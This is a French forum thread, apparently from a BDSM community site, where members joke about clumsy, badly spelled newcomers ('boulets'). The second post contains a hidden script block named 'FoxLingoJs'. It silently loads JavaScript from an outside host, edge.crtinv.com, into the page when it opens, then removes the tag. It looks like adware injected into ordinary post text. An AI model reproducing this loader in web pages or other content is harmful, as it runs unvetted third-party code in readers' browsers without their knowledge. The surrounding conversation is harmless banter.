analogique
#0

On se prendrait facilement, dans un mouvement premier d'humeur, à conspuer et honnir toutes celles et tous ceux qui font ici étalage de leur manque de finesse, de leurs balourdes stratégies d'approche, de leur syntaxe approximative ou orthographe phonétique, de leur peu d'inventivité érotique...


Mais c'est commettre une grave erreur que d'oublier que toute chose n'existe que dans sa relation à son contraire: il n'existe pas de jour sans nuit, pas de chaud sans froid, pas de douceur sans brutalité, pas de subtilité sans balourdise... Là où les pleurs s'amenuisent, la joie décroit pareillement. N'est-ce pas un principe de base sans lequel le bdsm n'existerait pas?


Il en va de même sur un site comme celui-ci: pas de pépites sans boulet. C'est sans doute la plus belle force de la faune bdsm que d'offrir une biodiversité au sein de laquelle les sensibilités les plus différentes s'expriment. Et ce qui est merveilleux, c'est qu'on est toujours le boulet de quelqu'un, ce qui nous offre par ailleurs la possibilité d'être la pépite de quelqu'un d'autre (même s'il faut avouer que certain(e)s ne semblent pas au premier abord cumuler beaucoup de chances d'intégrer souvent la deuxième catégorie).


Aussi, je tiens à remercier très solenellement toutes celles et tous ceux qui, chaque jour, offrent avec une belle constance à leur prochain la possibilité de se sentir différent.


Merci! Ne changez rien, surtout.

Dernière modification le 12/09/2012 14:46:20 par analogique.
1 personne aime(nt) ça.
theodorasubtv69
#2

Le boulet a par contre un ennemi: la langue Française.


On le reconnait en général par son usage immodéré du langage sms,  d'abriévations qu'il doit être le seul à comprendre  et l'utiisation d'un orthographe fantaisite.


En général, c'est un signe sur l'échelle internationale du Boulet.


<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>
Soyez la première personne à aimer.